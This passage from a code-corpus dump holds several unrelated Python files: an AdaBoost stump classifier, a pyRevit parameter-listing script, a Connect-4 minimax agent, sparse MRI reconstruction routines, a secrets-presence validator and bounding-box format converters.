        tuple: a (5, 2) ``np.matrix`` of features and the matching list of
        +1/-1 class labels.
    """
    features = [[1., 2.1],
                [2., 1.1],
                [1.3, 1.],
                [1., 1.],
                [2., 1.]]
    labels = [1.0, 1.0, -1.0, -1.0, 1.0]
    return np.matrix(features), labels
def stumpClassify(dataMatrix, dimen, threshVal, threshIneq):
    """Classify every sample with a single-feature threshold rule.

    Args:
        dataMatrix: (m, n) feature matrix.
        dimen: index of the feature the stump tests.
        threshVal: threshold to compare against.
        threshIneq: 'lt' labels values <= threshold as -1;
            anything else labels values > threshold as -1.

    Returns:
        np.ndarray: (m, 1) array of +1/-1 predictions.
    """
    predictions = np.ones((np.shape(dataMatrix)[0], 1))
    feature_column = dataMatrix[:, dimen]
    if threshIneq == 'lt':
        predictions[feature_column <= threshVal] = -1.0
    else:
        predictions[feature_column > threshVal] = -1.0
    return predictions


def buildStump(dataArr, classLabels, D):
    """Find the decision stump with the lowest weighted error.

    Each feature's range is discretised into ``numSteps`` thresholds and
    both inequality directions are tried; the stump minimising the
    D-weighted misclassification rate wins (ties keep the first found).

    Args:
        dataArr: (m, n) feature matrix (anything ``np.mat`` accepts).
        classLabels: length-m sequence of +1/-1 labels.
        D: (m, 1) matrix of AdaBoost sample weights.

    Returns:
        tuple: ({'dim', 'thresh', 'ineq'} describing the best stump,
        the weighted error as a 1x1 matrix,
        the (m, 1) predictions of that stump).
    """
    features = np.mat(dataArr)
    labels = np.mat(classLabels).T
    n_samples, n_features = np.shape(features)
    numSteps = 10.0
    best_stump = {}
    best_estimate = np.mat(np.zeros((n_samples, 1)))
    lowest_error = float('inf')
    # Try every feature, threshold and direction; keep the best combination.
    for dim in range(n_features):
        lo = features[:, dim].min()
        hi = features[:, dim].max()
        step = (hi - lo) / numSteps
        for offset in range(-1, int(numSteps) + 1):
            for rule in ('lt', 'gt'):
                threshold = lo + float(offset) * step
                estimate = stumpClassify(features, dim, threshold, rule)
                misses = np.mat(np.ones((n_samples, 1)))
                misses[estimate == labels] = 0
                # Misclassification rate weighted by the current sample weights.
                weighted_error = D.T * misses
                if weighted_error < lowest_error:
                    lowest_error = weighted_error
                    best_estimate = estimate.copy()
                    best_stump['dim'] = dim
                    best_stump['thresh'] = threshold
                    best_stump['ineq'] = rule
    return best_stump, lowest_error, best_estimate
def adaBoostTrainDS(dataArr, classLabels, numIt=40):
    """Train an AdaBoost ensemble of decision stumps.

    Args:
        dataArr: (m, n) feature matrix.
        classLabels: length-m sequence of +1/-1 labels.
        numIt: maximum number of boosting rounds (stops early on zero
            training error).

    Returns:
        list[dict]: one stump per round, each carrying its 'alpha' weight.
    """
    weak_learners = []
    n_samples = np.shape(dataArr)[0]
    # Start with uniform sample weights.
    sample_weights = np.mat(np.ones((n_samples, 1)) / n_samples)
    # Running weighted vote of all stumps trained so far.
    aggregate_estimate = np.mat(np.zeros((n_samples, 1)))
    for _ in range(numIt):
        stump, error, class_estimate = buildStump(dataArr, classLabels, sample_weights)
        # Stump weight; 1e-16 guards against division by a zero error.
        alpha = float(0.5 * np.log((1.0 - error) / max(error, 1e-16)))
        stump['alpha'] = alpha
        weak_learners.append(stump)
        # Increase weights of misclassified samples, decrease the rest.
        exponent = np.multiply(-1 * alpha * np.mat(classLabels).T, class_estimate)
        sample_weights = np.multiply(sample_weights, np.exp(exponent))
        sample_weights = sample_weights / sample_weights.sum()
        aggregate_estimate += alpha * class_estimate
        misclassified = np.multiply(np.sign(aggregate_estimate) != np.mat(classLabels).T,
                                    np.ones((n_samples, 1)))
        # Perfect training accuracy: no point boosting further.
        if misclassified.sum() / n_samples == 0:
            break
    return weak_learners
def adaClassify(dataToClass, classifierArr):
    """Predict +1/-1 labels with a trained AdaBoost ensemble.

    Args:
        dataToClass: samples to classify (anything ``np.mat`` accepts).
        classifierArr: stumps produced by ``adaBoostTrainDS``.

    Returns:
        np.matrix: (m, 1) signs of the alpha-weighted stump votes.
    """
    samples = np.mat(dataToClass)
    n_samples = np.shape(samples)[0]
    # Accumulate each stump's vote, weighted by its alpha.
    aggregate_estimate = np.mat(np.zeros((n_samples, 1)))
    for stump in classifierArr:
        vote = stumpClassify(samples, stump['dim'], stump['thresh'], stump['ineq'])
        aggregate_estimate += stump['alpha'] * vote
    # np.sign maps the weighted sum onto the final +1/0/-1 decision.
    return np.sign(aggregate_estimate)
# Apply AdaBoost on a harder, real-world data set.
def loadDataSet(filename):
    """Load a tab-separated data file into features and labels.

    Each line holds the feature values followed by the label in the last
    column. The original implementation opened the file twice and never
    closed either handle; this version reads it once inside a ``with``
    block and skips blank lines instead of crashing on them.

    Args:
        filename: path to the tab-separated data file.

    Returns:
        tuple: (list of per-sample feature lists, list of float labels).
    """
    dataMat = []
    labelMat = []
    with open(filename) as fr:
        for line in fr:
            curLine = line.strip().split('\t')
            # A blank trailing line splits to [''] — skip it.
            if curLine == ['']:
                continue
            dataMat.append([float(value) for value in curLine[:-1]])
            labelMat.append(float(curLine[-1]))
    return dataMat, labelMat
def testAdaBoostingOnHardDataset(trainFilename, testFilename, numIt=40):
    """Train AdaBoost on one file and report the test error rate.

    Args:
        trainFilename: tab-separated training data path.
        testFilename: tab-separated test data path.
        numIt: number of boosting rounds.

    Returns:
        float: misclassification rate on the test file, rounded to two
        decimal places.
    """
    train_features, train_labels = loadDataSet(trainFilename)
    # Fit the ensemble of weak stump classifiers.
    ensemble = adaBoostTrainDS(train_features, train_labels, numIt)
    test_features, test_labels = loadDataSet(testFilename)
    predictions = adaClassify(test_features, ensemble)
    # Count how many test predictions disagree with the labels.
    ones = np.mat(np.ones((len(test_features), 1)))
    n_wrong = ones[predictions != np.mat(test_labels).T].sum()
    return round(n_wrong / len(test_features), 2)
if __name__ == '__main__':
    # Smoke test on the hard (horse colic) data set. The commented lines
    # below exercise the simple toy data set instead.
    # dataMat, classLabels = loadSimpData()
    # D = np.mat(np.ones((5, 1))/5)
    # bestStump, minError, bestClasEst = buildStump(dataMat, classLabels, D)
    # print(bestStump, minError, bestClasEst)
    # classifierArray = adaBoostTrainDS(dataMat, classLabels, 9)
    # print(classifierArray)
    # classifyRes = adaClassify([0,0], classifierArray)
    # print(classifyRes)
    # Harder data set: train/test on the horse colic files with 50 rounds.
    errorRate = testAdaBoostingOnHardDataset('horseColicTraining2.txt', 'horseColicTest2.txt', 50)
    print(errorRate)
1634697 | <reponame>Melca-G/Aeolus
from pyrevit.framework import List
from pyrevit import revit, DB
import clr
clr.AddReference('RevitAPI')
clr.AddReference('RevitAPIUI')
# clr.AddReference("System.Windows.Form")
from Autodesk.Revit.DB import FilteredElementCollector, FilteredWorksetCollector, RevitLinkType,BuiltInParameter,\
Workset,WorksetKind
from Autodesk.Revit.DB import BuiltInCategory, ElementId, XYZ, Point, Transform, Transaction,FamilySymbol
from System.Collections.Generic import List
from pyrevit import script
from pyrevit import forms
import pyrevit
clr.AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
from System.Windows.Forms import Application, SendKeys
# Handles to the active Revit UI document and its underlying Document;
# `__revit__` is injected into the script's globals by pyRevit.
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document

# Shown by pyRevit as the tool's tooltip/description.
__doc__ = 'Get all parameters of the selected element.'
def get_selected_elements(doc):
    """Return the elements currently selected in the active Revit UI.

    Supports both the Revit 2016+ selection API
    (``Selection.GetElementIds``) and the legacy ``Selection.Elements``
    property.

    Args:
        doc: the active Revit ``Document``, used to resolve element ids.

    Returns:
        list: the selected ``Element`` objects (possibly empty).
    """
    try:
        # Revit 2016+: selection is exposed as element ids.
        return [doc.GetElement(eid)
                for eid in __revit__.ActiveUIDocument.Selection.GetElementIds()]
    except Exception:
        # Pre-2016 API exposed the elements directly. A bare ``except:``
        # would also swallow SystemExit/KeyboardInterrupt, hence the
        # narrower Exception here.
        return list(__revit__.ActiveUIDocument.Selection.Elements)
# Grab whatever is currently selected in the Revit UI.
selection = get_selected_elements(doc)
print(selection)
# convenience variable for first element in selection
if len(selection):
    s0 = selection[0]
def get_all_parameters(element):
    """Collect ``"name: value"`` strings for every parameter of *element*.

    The accessor used for the value is chosen from the parameter's
    ``StorageType`` (String / Integer / Double / ElementId); parameters
    with any other storage type are skipped.

    Args:
        element: a Revit element exposing a ``Parameters`` collection.

    Returns:
        list[str]: one ``"<name>: <value>"`` entry per readable parameter.
    """
    results = []
    for param in element.Parameters:
        if not param:
            continue
        name = param.Definition.Name
        storage = str(param.StorageType)
        if 'String' in storage:
            try:
                results.append(name + ': ' + str(param.AsString()))
            except Exception:
                # Some string parameters only expose a display value.
                # (Was a bare ``except:``, which also hid SystemExit and
                # KeyboardInterrupt.)
                results.append(name + ': ' + str(param.AsValueString()))
        elif 'Integer' in storage:
            results.append(name + ': ' + str(param.AsInteger()))
        elif 'Double' in storage:
            results.append(name + ': ' + str(param.AsDouble()))
        elif 'ElementId' in storage:
            results.append(name + ': ' + str(param.AsElementId().IntegerValue))
    return results
# Print every parameter of the first selected element, one per line.
for i in get_all_parameters(selection[0]):
    print(i)
| StarcoderdataPython |
1642601 | <reponame>smoosavioon/saeedconnect4<filename>agents/agent_minimax/minimax.py
import numpy as np
from agents.common import PlayerAction, BoardPiece, SavedState, GenMove, GameState, connected_four, PLAYER1, PLAYER2, apply_player_action, check_end_state
import math
from typing import Optional, Callable, Tuple
def evaluate_window(window: np.array, player: BoardPiece) -> np.float:
    """Score a four-cell window from *player*'s point of view.

    Scoring: 4 own pieces -> +100; 3 own + 1 empty -> +5;
    2 own + 2 empty -> +2; 3 opponent pieces + 1 empty -> -4.
    """
    cells = list(window)
    opponent = PLAYER1 if player == PLAYER2 else PLAYER2
    own = cells.count(player)
    empty = cells.count(0)
    score = 0
    if own == 4:
        score += 100
    elif own == 3 and empty == 1:
        score += 5
    elif own == 2 and empty == 2:
        score += 2
    # Penalise windows the opponent is one move from completing.
    if cells.count(opponent) == 3 and empty == 1:
        score -= 4
    return score
def score_position(board: np.ndarray, player: BoardPiece) -> np.float:
    """Heuristic evaluation of a 6x7 Connect-4 board for *player*.

    Sums ``evaluate_window`` over every horizontal, vertical and diagonal
    four-cell window, plus a centre-column occupancy bonus.
    """
    score = 0
    # Centre-column bonus: 3 points per own piece in column 3.
    centre_column = list(board[:, 3])
    score += 3 * centre_column.count(player)
    # Horizontal windows.
    for row in range(6):
        row_values = board[row, :]
        for col in range(4):
            score += evaluate_window(row_values[col:col + 4], player)
    # Vertical windows.
    for col in range(7):
        col_values = board[:, col]
        for row in range(3):
            score += evaluate_window(col_values[row:row + 4], player)
    # Positively sloped diagonals.
    for row in range(3):
        for col in range(4):
            score += evaluate_window([board[row + i][col + i] for i in range(4)], player)
    # Negatively sloped diagonals.
    for row in range(3):
        for col in range(4):
            score += evaluate_window([board[row + 3 - i][col + i] for i in range(4)], player)
    return score
def alpha_beta(
    board: np.ndarray, player: BoardPiece, depth: np.int, alpha: np.float, beta: np.float, maximizingPlayer: bool
) -> Tuple[PlayerAction, np.float]:
    """Minimax search with alpha-beta pruning over Connect-4 moves.

    Args:
        board: current board state.
        player: piece of the player to move at this node.
        depth: remaining search depth; 0 falls back to the heuristic.
        alpha, beta: current pruning window.
        maximizingPlayer: True when this node maximises the score.

    Returns:
        (column, score): chosen column and its minimax value.
        NOTE(review): terminal branches return PlayerAction(-1) or a random
        valid column wrapped from a 1-element array, so only the score of
        non-root recursive calls is used — confirm callers never play the
        column from a terminal node.
    """
    # Playable columns: those whose top cell is still empty.
    valid_columns = np.where(board[-1, :] == 0)[0]
    opp_player = PLAYER2 if player == PLAYER1 else PLAYER1
    # The game may already be decided by the move that led to this node.
    game_state = check_end_state(board, opp_player if maximizingPlayer else player)
    if depth == 0 or game_state in (GameState.IS_DRAW, GameState.IS_WIN):
        if game_state == GameState.IS_WIN:
            # A win found here belongs to the player who just moved.
            if maximizingPlayer:
                return PlayerAction(-1), -1000000000000
            else:
                return PlayerAction(-1), 1000000000000
        elif game_state == GameState.IS_DRAW:
            return PlayerAction(np.random.choice(np.array(valid_columns).flatten(), 1)), 0
        else:  # depth = 0
            return PlayerAction(np.random.choice(np.array(valid_columns).flatten(), 1)), score_position(board, player)
    if maximizingPlayer:
        value = -math.inf
        column = np.random.choice(np.array(valid_columns).flatten(), 1)
        for col in valid_columns:
            # apply_player_action(..., True) works on a copy of the board.
            new_board = apply_player_action(board, PlayerAction(col), player, True)
            new_score = alpha_beta(new_board, opp_player, depth - 1, alpha, beta, False)[1]
            if new_score > value:
                value = new_score
                column = col
            alpha = max(alpha, value)
            if alpha >= beta:
                break  # beta cut-off
        return PlayerAction(column), value
    else:  # Minimizing player
        value = math.inf
        column = np.random.choice(np.array(valid_columns).flatten(), 1)
        for col in valid_columns:
            new_board = apply_player_action(board, PlayerAction(col), player, True)
            new_score = alpha_beta(new_board, opp_player, depth - 1, alpha, beta, True)[1]
            if new_score < value:
                value = new_score
                column = col
            beta = min(beta, value)
            if alpha >= beta:
                break  # alpha cut-off
        return PlayerAction(column), value
def generate_move_minimax(
    board: np.ndarray, _player: BoardPiece, saved_state: Optional[SavedState]
) -> Tuple[PlayerAction, SavedState]:
    """Choose a move for *_player* via depth-4 alpha-beta minimax search.

    Returns the chosen column and the (unused) saved state unchanged.
    """
    search_depth = 4
    # Root call: maximise for the moving player with an open pruning window.
    chosen_column, _score = alpha_beta(board, _player, search_depth,
                                       -math.inf, math.inf, True)
    return PlayerAction(chosen_column), saved_state
| StarcoderdataPython |
1699634 | <reponame>hanaecarrie/pisap
##########################################################################
# XXX - Copyright (C) XXX, 2017
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
from __future__ import print_function
import numpy as np
import copy
# Package import
from ..base.image import Image
from ..stats import sigma_mad
from .linear import Identity
from .proximity import SoftThreshold
from .proximity import Positive
from .optimization import CondatVu
from .optimization import FISTA
from .cost import SynthesisCost, AnalysisCost, DualGapCost
from .reweight import cwbReweight
from .reweight import mReweight
from .noise import sigma_mad_sparse
def sparse_rec_condat_vu(
        data, gradient_cls, gradient_kwargs, linear_cls, linear_kwargs,
        std_est=None, std_est_method=None, std_thr=2.,
        mu=1.0e-6, tau=None, sigma=None, relaxation_factor=1.0,
        nb_of_reweights=1, max_nb_of_iter=150, add_positivity=False, atol=1e-4,
        metric_call_period=5, metrics={}, verbose=0):
    """ The Condat-Vu sparse reconstruction with reweightings.

    Parameters
    ----------
    data: ndarray
        the data to reconstruct: observations are expected in Fourier space.
    gradient_cls: class
        a derived 'GradBase' class.
    gradient_kwargs: dict
        the 'gradient_cls' parameters, the first parameter is the data to
        be reconstructed.
    linear_cls: class
        a linear operator class.
    linear_kwargs: dict
        the 'linear_cls' parameters.
    std_est: float (optional, default None)
        the noise std estimate.
        If None use the MAD as a consistent estimator for the std.
    std_est_method: str (optional, default None)
        if the standard deviation is not set, estimate this parameter using
        the mad routine in the image ('image') or in the sparse wavelet
        decomposition ('sparse') domain. The sparse strategy is computed
        at each iteration on the residuals.
    std_thr: float (optional, default 2.)
        use this threshold expressed as a number of sigmas in the dual
        proximity operator during the thresholding.
    mu: float (optional, default 1.0e-6)
        regularization hyperparameter
    tau, sigma: float (optional, default None)
        parameters of the Condat-Vu proximal-dual splitting algorithm.
        If None estimates these parameters.
    relaxation_factor: float (optional, default 1.0)
        parameter of the Condat-Vu proximal-dual splitting algorithm.
        If 1, no relaxation.
    nb_of_reweights: int (optional, default 1)
        the number of reweightings.
    max_nb_of_iter: int (optional, default 150)
        the maximum number of iterations in the Condat-Vu proximal-dual
        splitting algorithm.
    add_positivity: bool (optional, default False)
        by setting this option, set the proximity operator to identity or
        positive.
    atol: float (optional, default 1e-4)
        tolerance threshold for convergence.
    metric_call_period: int (default is 5)
        the period on which the metrics are compute.
    metrics: dict, {'metric_name': [metric, if_early_stooping],} (optional)
        the list of desired convergence metrics.
        NOTE(review): this is a shared mutable default and is mutated below
        via ``metrics.update(...)`` — callers should pass their own dict.
    verbose: int (optional, default 0)
        the verbosity level.

    Returns
    -------
    x_final: Image
        the estimated Condat-Vu primal solution.
    y_final: DictionaryBase
        the estimated Condat-Vu dual solution.
    """
    if verbose > 0:
        print("Starting Condat-Vu primal-dual algorithm.")

    # Check input parameters
    if std_est_method not in (None, "image", "sparse"):
        raise ValueError("Unrecognize std estimation method "
                         "'{0}'.".format(std_est_method))

    # Define the gradient operator
    grad_op = gradient_cls(data, **gradient_kwargs)

    # Define the linear operator
    linear_op = linear_cls(**linear_kwargs)
    img_shape = grad_op.ft_cls.img_shape

    # Define the weights used during the thresholding in the dual domain
    if std_est_method == "image":
        # Define the noise std estimate in the image domain
        if std_est is None:
            std_est = sigma_mad(grad_op.MtX(data))
        weights = linear_op.op(np.zeros(data.shape))
        weights[...] = std_thr * std_est
        reweight_op = cwbReweight(weights, wtype=std_est_method)
        prox_dual_op = SoftThreshold(reweight_op.weights)
        extra_factor_update = sigma_mad_sparse
    elif std_est_method == "sparse":
        # Define the noise std estimate in the sparse wavelet domain
        if std_est is None:
            std_est = 1.0
        weights = linear_op.op(np.zeros(data.shape))
        weights[...] = std_thr * std_est
        reweight_op = mReweight(weights, wtype=std_est_method,
                                thresh_factor=std_thr)
        prox_dual_op = SoftThreshold(reweight_op.weights)
        extra_factor_update = sigma_mad_sparse
    elif std_est_method is None:
        # manual regularization mode: constant threshold mu, no reweighting
        levels = linear_op.op(np.zeros(img_shape))
        levels[...] = mu
        prox_dual_op = SoftThreshold(levels)
        extra_factor_update = None
        nb_of_reweights = 0

    # Define the Condat Vu optimizer: define the tau and sigma in the
    # Condat-Vu proximal-dual splitting algorithm if not already provided.
    # Check also that the combination of values will lead to convergence.
    norm = linear_op.l2norm(img_shape)
    lipschitz_cst = grad_op.spec_rad
    if sigma is None:
        sigma = 0.5
    if tau is None:
        # to avoid numerics troubles with the convergence bound
        eps = 1.0e-8
        # due to the convergence bound
        tau = 1.0 / (lipschitz_cst/2 + sigma * norm**2 + eps)
    convergence_test = (
        1.0 / tau - sigma * norm ** 2 >= lipschitz_cst / 2.0)

    if verbose > 0:
        print(" - mu: ", mu)
        print(" - lipschitz_cst: ", lipschitz_cst)
        print(" - tau: ", tau)
        print(" - sigma: ", sigma)
        print(" - rho: ", relaxation_factor)
        print(" - std: ", std_est)
        print(" - 1/tau - sigma||L||^2 >= beta/2: ", convergence_test)
        print("-" * 20)

    # Define initial primal and dual solutions
    # NOTE(review): np.complex is deprecated/removed in recent NumPy releases.
    primal = np.zeros(img_shape, dtype=np.complex)
    dual = linear_op.op(primal)
    dual[...] = 0.0

    # Define the proximity operator
    if add_positivity:
        prox_op = Positive()
    else:
        prox_op = Identity()

    # by default add the lasso cost metric
    lasso = AnalysisCost(data, grad_op, linear_op, mu)
    lasso_cost = {'lasso': {'metric': lasso,
                            'mapping': {'x_new': 'x', 'y_new': None},
                            'cst_kwargs': {},
                            'early_stopping': False}}
    metrics.update(lasso_cost)

    # by default add the dual-gap cost metric
    dual_gap = DualGapCost(linear_op)
    dual_gap_cost = {'dual_gap': {'metric': dual_gap,
                                  'mapping': {'x_new': 'x', 'y_new': 'y'},
                                  'cst_kwargs': {},
                                  'early_stopping': False}}
    metrics.update(dual_gap_cost)

    # Define the Condat-Vu optimization method
    opt = CondatVu(x=primal, y=dual, grad=grad_op, prox=prox_op,
                   prox_dual=prox_dual_op, linear=linear_op, sigma=sigma,
                   tau=tau, rho=relaxation_factor, rho_update=None,
                   sigma_update=None, tau_update=None, extra_factor=1.0,
                   extra_factor_update=extra_factor_update,
                   metric_call_period=metric_call_period, metrics=metrics)

    # Perform the first reconstruction
    opt.iterate(max_iter=max_nb_of_iter)

    # Perform reconstruction with reweightings
    # Loop through number of reweightings
    for reweight_index in range(nb_of_reweights):

        # Welcome message
        if verbose > 0:
            print("-" * 10)
            print(" - Reweight: ", reweight_index + 1)
            print("-" * 10)

        # Generate the new weights following reweighting prescription
        if std_est_method == "image":
            reweight_op.reweight(linear_op.op(opt.x_new))
        else:
            # NOTE(review): `multiscale_sigma_mad` is neither defined nor
            # imported in this module (only `sigma_mad_sparse` is); this
            # branch would raise NameError — confirm the intended helper.
            std_est = multiscale_sigma_mad(grad_op, linear_op)
            reweight_op.reweight(std_est, linear_op.op(opt.x_new))

        # Update the weights in the dual proximity operator
        prox_dual_op.update_weights(reweight_op.weights)

        # Update the weights in the cost function
        # NOTE(review): `cost_op` is never defined in this function (the
        # cost metrics live in `metrics`); this line would raise NameError
        # whenever a reweight iteration runs — verify before relying on
        # nb_of_reweights > 0.
        cost_op.update_weights(reweight_op.weights)

        # Perform optimisation with new weights
        opt.iterate(max_iter=max_nb_of_iter)

    linear_op.set_coeff(opt.y_final)
    return Image(data=opt.x_final), linear_op, opt.metrics
#XXX linear_op.transform -> linear_op for DL
def sparse_rec_fista(
        data, gradient_cls, gradient_kwargs, linear_cls, linear_kwargs,
        mu, lambda_init=1.0, max_nb_of_iter=300, atol=1e-4,
        metric_call_period=5, metrics={}, verbose=0):
    """ The FISTA sparse reconstruction (synthesis formulation).

    Parameters
    ----------
    data: ndarray
        the data to reconstruct: observations are expected in Fourier space.
    gradient_cls: class
        a derived 'GradBase' class.
    gradient_kwargs: dict
        the 'gradient_cls' parameters, the first parameter is the data to
        be reconstructed.
    linear_cls: class
        a linear operator class.
    linear_kwargs: dict
        the 'linear_cls' parameters.
    mu: float
        coefficient of regularization.
    lambda_init: float, (default 1.0)
        initial value for the FISTA step.
    max_nb_of_iter: int (optional, default 300)
        the maximum number of iterations in the FISTA algorithm.
    atol: float (optional, default 1e-4)
        tolerance threshold for convergence.
    metric_call_period: int (default is 5)
        the period on which the metrics are compute.
    metrics: dict, {'metric_name': [metric, if_early_stooping],} (optional)
        the list of desired convergence metrics.
        NOTE(review): shared mutable default, mutated via ``metrics.update``.
    verbose: int (optional, default 0)
        the verbosity level.

    Returns
    -------
    x_final: Image,
        the estimated FISTA solution.
    y_final: Dictionary,
        the dictionary transformation estimated FISTA solution
    metrics_list: list of Dict,
        the convergence metrics
    """
    if verbose > 0:
        print("Starting FISTA reconstruction algorithm.")

    # Define the linear operator
    linear_op = linear_cls(**linear_kwargs)

    # Define the gradient operator
    # NOTE(review): this mutates the caller's `gradient_kwargs` dict in place.
    gradient_kwargs["linear_cls"] = linear_op
    grad_op = gradient_cls(data, **gradient_kwargs)
    lipschitz_cst = grad_op.spec_rad
    if verbose > 0:
        print(" - mu: ", mu)
        print(" - lipschitz_cst: ", lipschitz_cst)
        print("-" * 20)

    # Define initial primal and dual solutions
    shape = grad_op.ft_cls.img_shape
    # NOTE(review): np.complex is deprecated/removed in recent NumPy releases.
    x_init = np.zeros(shape, dtype=np.complex)
    alpha = linear_op.op(x_init)
    alpha[...] = 0.0

    # Define the proximity dual operator: soft threshold at level mu
    weights = copy.deepcopy(alpha)
    weights[...] = mu
    prox_op = SoftThreshold(weights)

    # by default add the lasso cost metric
    lasso = SynthesisCost(data, grad_op, mu)
    lasso_cost = {'lasso': {'metric': lasso,
                            'mapping': {'x_new': None, 'y_new': 'x'},
                            'cst_kwargs': {},
                            'early_stopping': False}}
    metrics.update(lasso_cost)

    opt = FISTA(x=alpha, grad=grad_op, prox=prox_op,
                metric_call_period=metric_call_period, metrics=metrics)

    # Perform the reconstruction
    opt.iterate(max_iter=max_nb_of_iter)
    # Store the final sparse coefficients on the transform before returning.
    linear_op.transform.analysis_data = opt.y_final
    return Image(data=opt.x_final), linear_op.transform, opt.metrics
| StarcoderdataPython |
# Secret names that must be present under the "secrets" key of the parsed
# secrets file.
EXPECTED_SECRETS = [
    "EQ_SERVER_SIDE_STORAGE_USER_ID_SALT",
    "EQ_SERVER_SIDE_STORAGE_USER_IK_SALT",
    "EQ_SERVER_SIDE_STORAGE_ENCRYPTION_USER_PEPPER",
    "EQ_SECRET_KEY",
    "EQ_RABBITMQ_USERNAME",
    "EQ_RABBITMQ_PASSWORD",
]


def validate_required_secrets(secrets):
    """Ensure every expected secret is present in the parsed secrets file.

    Args:
        secrets: mapping with a "secrets" key holding name/value pairs.

    Raises:
        ValueError: if any name from EXPECTED_SECRETS is missing.
            (Previously a bare ``Exception``; ValueError is a subclass, so
            existing ``except Exception`` callers keep working.)
    """
    for required_secret in EXPECTED_SECRETS:
        if required_secret not in secrets["secrets"]:
            raise ValueError("Missing Secret [{}]".format(required_secret))
class SecretStore:
    """Read-only view over the "secrets" section of a parsed secrets file."""

    def __init__(self, secrets):
        """Keep only the "secrets" mapping; absent section -> empty dict."""
        self.secrets = secrets.get("secrets", {})

    def get_secret_by_name(self, secret_name):
        """Return the value stored under *secret_name*, or None if absent."""
        return self.secrets.get(secret_name)
| StarcoderdataPython |
190193 | <gh_stars>10-100
from numba import jit
import cv2
import numpy as np
import random
# Public API of this module.
# NOTE(review): 'draw_bboxes' and 'load_image' are expected to be defined
# later in this file (not visible in this chunk).
__all__ = ['coco2yolo', 'yolo2coco', 'voc2coco', 'coco2voc', 'yolo2voc', 'voc2yolo',
           'bbox_iou', 'draw_bboxes', 'load_image']
@jit(nopython=True)
def voc2yolo(bboxes, height=720, width=1280):
    """
    voc  => [x1, y1, x2, y2]
    yolo => [xmid, ymid, w, h] (normalized)

    NOTE(review): mutates *bboxes* in place (the defensive ``.copy()`` is
    commented out), so pass a float array you are willing to overwrite.
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # Normalise corner coordinates to [0, 1].
    bboxes[..., 0::2] /= width
    bboxes[..., 1::2] /= height
    # (x2, y2) -> (w, h).
    bboxes[..., 2] -= bboxes[..., 0]
    bboxes[..., 3] -= bboxes[..., 1]
    # (x1, y1) -> (xmid, ymid).
    bboxes[..., 0] += bboxes[..., 2]/2
    bboxes[..., 1] += bboxes[..., 3]/2
    return bboxes
@jit(nopython=True)
def yolo2voc(bboxes, height=720, width=1280):
    """
    yolo => [xmid, ymid, w, h] (normalized)
    voc  => [x1, y1, x2, y2]

    NOTE(review): mutates *bboxes* in place (the defensive ``.copy()`` is
    commented out).
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # De-normalise to pixel coordinates.
    bboxes[..., 0::2] *= width
    bboxes[..., 1::2] *= height
    # (xmid, ymid) -> (x1, y1).
    bboxes[..., 0:2] -= bboxes[..., 2:4]/2
    # (w, h) -> (x2, y2).
    bboxes[..., 2:4] += bboxes[..., 0:2]
    return bboxes
@jit(nopython=True)
def coco2yolo(bboxes, height=720, width=1280):
    """
    coco => [xmin, ymin, w, h]
    yolo => [xmid, ymid, w, h] (normalized)

    NOTE(review): mutates *bboxes* in place (the defensive ``.copy()`` is
    commented out).
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # normolizinig
    bboxes[..., 0::2] /= width
    bboxes[..., 1::2] /= height
    # converstion (xmin, ymin) => (xmid, ymid)
    bboxes[..., 0:2] += bboxes[..., 2:4]/2
    return bboxes
@jit(nopython=True)
def yolo2coco(bboxes, height=720, width=1280):
    """Convert boxes in-place from YOLO to COCO format.

    yolo => [xmid, ymid, w, h] (normalized)
    coco => [xmin, ymin, w, h] (absolute pixels)

    NOTE(review): mutates *bboxes* in place; expects a float array.
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # denormalizing
    bboxes[..., 0::2] *= width
    bboxes[..., 1::2] *= height
    # converstion (xmid, ymid) => (xmin, ymin)
    bboxes[..., 0:2] -= bboxes[..., 2:4]/2
    return bboxes
@jit(nopython=True)
def voc2coco(bboxes, height=720, width=1280):
    """Convert boxes in-place from VOC to COCO format.

    voc  => [xmin, ymin, xmax, ymax]
    coco => [xmin, ymin, w, h]

    ``height``/``width`` are unused; kept for a uniform converter signature.
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # conversion (xmax, ymax) => (w, h)
    bboxes[..., 2:4] -= bboxes[..., 0:2]
    return bboxes
@jit(nopython=True)
def coco2voc(bboxes, height=720, width=1280):
    """Convert boxes in-place from COCO to VOC format.

    coco => [xmin, ymin, w, h]
    voc  => [xmin, ymin, xmax, ymax]

    ``height``/``width`` are unused; kept for a uniform converter signature.
    """
    # bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
    # conversion (w, h) => (xmax, ymax)
    bboxes[..., 2:4] += bboxes[..., 0:2]
    return bboxes
@jit(nopython=True)
def bbox_iou(b1, b2):
    """Calculate the Intersection over Union (IoU) between bounding boxes.

    Args:
        b1 (np.ndarray): boxes of shape (N, 4) in [xmin, ymin, xmax, ymax] format.
        b2 (np.ndarray): boxes of shape (N, 4) in [xmin, ymin, xmax, ymax] format.
            NOTE(review): the arithmetic below is element-wise, so this is a
            *paired* IoU (b1[i] vs b2[i]), not an NxM cross product — the two
            arrays must broadcast against each other; confirm callers.

    Returns:
        np.ndarray: per-pair IoUs (squeezed); 0/0 unions become 0 via nan_to_num.
    """
    # 0 = np.convert_to_tensor(0.0, b1.dtype)
    # b1 = b1.astype(np.float32)
    # b2 = b2.astype(np.float32)
    b1_xmin, b1_ymin, b1_xmax, b1_ymax = np.split(b1, 4, axis=-1)
    b2_xmin, b2_ymin, b2_xmax, b2_ymax = np.split(b2, 4, axis=-1)
    # Clamp degenerate (inverted) boxes to zero extent.
    b1_height = np.maximum(0, b1_ymax - b1_ymin)
    b1_width = np.maximum(0, b1_xmax - b1_xmin)
    b2_height = np.maximum(0, b2_ymax - b2_ymin)
